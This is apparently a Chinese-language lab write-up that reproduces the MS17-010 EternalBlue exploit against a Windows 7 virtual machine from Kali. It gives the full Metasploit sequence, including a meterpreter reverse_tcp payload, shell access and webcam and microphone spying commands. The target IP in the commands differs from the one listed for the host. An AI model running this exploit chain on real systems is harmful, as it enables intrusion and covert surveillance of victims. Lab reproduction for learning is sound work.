MS17_010 永恒之蓝复现

环境

主机	IP
kali	192.168.252.128
windos7	192.168.252.139

漏洞介绍

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

Metasploit渗透测试模块

Metasploit介绍及命令：https://blog.csdn.net/qq_39583774/article/details/119144119

启动方法：msfconsole 

主机探测

nmap -sV 192.168.252.139

查找模块ms17-010

search ms17-010

使用方法：

use exploit/windows/smb/ms17_010_eternalblue #选择模块
set rhost 192.168.252.138 #设置攻击目标ip
set lhost 192.168.252.128 #设置kali ip
set payload windows/x64/meterpreter/reverse_tcp #攻击模块装载
run #开始攻击

这里已经渗透成功使用命令模块
Stdapi: Webcam Commands

Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam

sessions -I  #可以查看控制的计算机
sessions -I id  #进入以控制的计算机
background  #退回上一级
shell  #建立shell

因为windos7 系统是中文会出现乱码
chcp 65001#可以解决

尝试使用获取windos 7 的摄像头

先决条件：windos7有摄像头，并能够使用。

这里使用虚拟机连接真实机摄像头

这里拍了一张照片，我拿手挡住了，建议大家还是把笔记本电脑的摄像头拿东西挡住。

webcam_snap